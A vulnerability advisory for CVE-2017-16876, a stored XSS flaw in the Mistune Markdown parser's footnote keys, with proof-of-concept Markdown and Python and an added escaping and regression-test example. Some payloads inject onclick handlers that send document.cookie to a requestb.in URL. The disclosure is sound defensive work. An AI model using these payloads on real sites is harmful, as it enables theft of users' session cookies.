Mistune – Stored XSS vulnerability in the _keyify function
Date
07.11.2017
Affected Vendor
Lepture
Affected Product
Mistune – The fastest markdown parser in pure Python with renderer features, inspired by marked. – https://github.com/lepture/mistune/
Vulnerable version
0.8
Fixed version
0.8.1
CVSS
6.1 Medium 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Recommendations
Update to Mistune version 0.8.1
Vulnerability details
Alert proof of concept:
Footnote 1 link[^first" onclick="alert(1)].
[^first" onclick="alert(1)]: Footnot
Proof of concept that redirects to a request bin with document.cookie appended:
Footnote 1 link[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)].
[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)]: Footnot
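Python example:
import mistune
# escape=True asks the renderer to escape HTML found in the Markdown input.
renderer = mistune.Renderer(escape=True, hard_wrap=True)
markdown = mistune.Markdown(renderer=renderer)
# Control case: a double quote inside a link target does not break out of the attribute.
print('Works good:', markdown('[asd](qwe"onmouseover=")'))
# Vulnerable case: the same kind of quote inside a footnote key is emitted unescaped.
xss = "Footnote 1 link[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)].\n[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)]: Footnot"
print('XSS:', markdown(xss))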
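The escaping gap the proof of concept relies on, as an added example that is neither Mistune's code nor the advisory author's: a simplified model in which a footnote key is placed inside double-quoted attributes. The names `keyify_unsafe`, `keyify_safe`, `render_footnote_ref` and the HTML template are assumptions made for illustration; the hardened form escapes the key with quotes included, and the attribute check can serve as a regression test for a renderer's output.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample: the footnote key from the alert proof of concept above.
POC_KEY = 'first" onclick="alert(1)'

_WHITESPACE = re.compile(r"\s+")


def keyify_unsafe(key):
    """Model of the flaw (assumption): normalise the key, leave quotes as-is."""
    return _WHITESPACE.sub(" ", key.lower())


def keyify_safe(key):
    """Hardened form (assumption): HTML-escape the key, quotes included."""
    return _WHITESPACE.sub(" ", html.escape(key.lower(), quote=True))


def render_footnote_ref(key, index):
    """Hypothetical renderer: the key lands in double-quoted attributes."""
    return ('<sup class="footnote-ref" id="fnref-%s">'
            '<a href="#fn-%s">%d</a></sup>') % (key, key, index)


class _AttrCollector(HTMLParser):
    """Collects every attribute name the HTML parser sees on start tags."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)


def event_handlers(fragment):
    """Return the sorted on* attribute names parsed from an HTML fragment."""
    collector = _AttrCollector()
    collector.feed(fragment)
    collector.close()
    return sorted({n for n in collector.names if n.startswith("on")})


if __name__ == "__main__":
    for keyify in (keyify_unsafe, keyify_safe):
        out = render_footnote_ref(keyify(POC_KEY), 1)
        print(keyify.__name__, event_handlers(out), out)
```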
CVE
CVE-2017-16876
Credits
Dawid Czarnecki